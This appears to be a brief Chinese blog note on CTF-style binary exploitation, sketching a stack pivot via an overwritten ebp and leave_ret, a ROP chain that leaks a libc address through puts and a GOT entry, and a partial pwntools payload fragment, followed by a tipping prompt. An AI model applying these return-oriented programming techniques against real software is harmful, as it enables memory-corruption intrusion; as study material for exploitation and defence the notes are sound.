劫持一次流程,覆盖一次ebp
栈迁移后跳到read
正常Rop到libc,再rop,再到libc
rop到libc,由于跳到read上,后面可以继续任意地址跳转
pop_ret
leave_ret
payload += elf.plt[‘puts’]
payload += p32(pop_ebp_ret)
payload += p32(elf.got["__libc_start"])
payload += addr
payload += p32(leave_ret)
没调用函数,函数的got值指向用户代码段,若被执行过会指向libc该函数的
「真诚赞赏,手留余香」
Mr.Be1ieVe's Treasure
真诚赞赏,手留余香
使用微信扫描二维码完成支付
